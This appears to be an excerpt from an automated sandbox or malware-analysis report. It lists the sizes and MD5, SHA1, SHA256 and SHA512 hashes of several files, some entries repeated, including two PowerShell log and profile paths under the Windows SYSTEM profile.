SHA512c6585fa702987f7ac02191cecba70055b94075978e199521fd8b7495351b3a014d79be2b0331f9c9b4aa65567779f15b879ee0270b78c08ca8aa7089425ea9ae
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD51fa3b8d699db2f1d6ac367d0fd84a88d
SHA1baab5cf03b13beb39c06b3a4dba97e0659618c43
SHA25654d5db2bc80acd62c0bf06a1aa4a5703ceafa6ef84966e13c9596ea87ae21279
SHA512396d05e369250f6a42b911362a28d07931c5d86b517bf3b06d0fa1afa415116266f4857287eb3bf90466fb43e22491ccf4d2beb95cacfe735b9ed5cb16ffd65f
-
Filesize
6.2MB
MD58a3a40b1e33abc103e2ad313b08893d9
SHA1a3dfeb31e70b046b5a1c64af8944192f50a100d8
SHA256814348c8b02b0b85dcd8f8cffe5510cf0b16cc97bfca143dde161b93b3d18a04
SHA5127001ba5ce25b5f4dea6c5ec7226f8013ad44f4ed4c0b339d28358b3c4f933a4f52b75a9beb186f43fe735797f88f19e464a1cb4ef62e92d1deb8c024312c3ea8
-
Filesize
6.2MB
MD58a3a40b1e33abc103e2ad313b08893d9
SHA1a3dfeb31e70b046b5a1c64af8944192f50a100d8
SHA256814348c8b02b0b85dcd8f8cffe5510cf0b16cc97bfca143dde161b93b3d18a04
SHA5127001ba5ce25b5f4dea6c5ec7226f8013ad44f4ed4c0b339d28358b3c4f933a4f52b75a9beb186f43fe735797f88f19e464a1cb4ef62e92d1deb8c024312c3ea8
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize
6.8MB
MD5195ac65216aad2f39a63ab39efbe915e
SHA180acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA2566f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize
5KB
MD5a65047f6c484d322339140e4e5b79f44
SHA1806b2b50cb7bb2a6f7d2de96ff7fb6db52bd542e
SHA2563d2c7eaf69512748b5726e7db9c3c0e1e06da2a6efe417665f3712ce62c9002f
SHA512e4b035dba8183690b45f77298dda96bdc40ebf7659cf339e45b7a65d0cf05da6dca27e99cdb3bd7bf692f1bdebd7f6e54265a4244945799d5b3f5d4943f90966
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732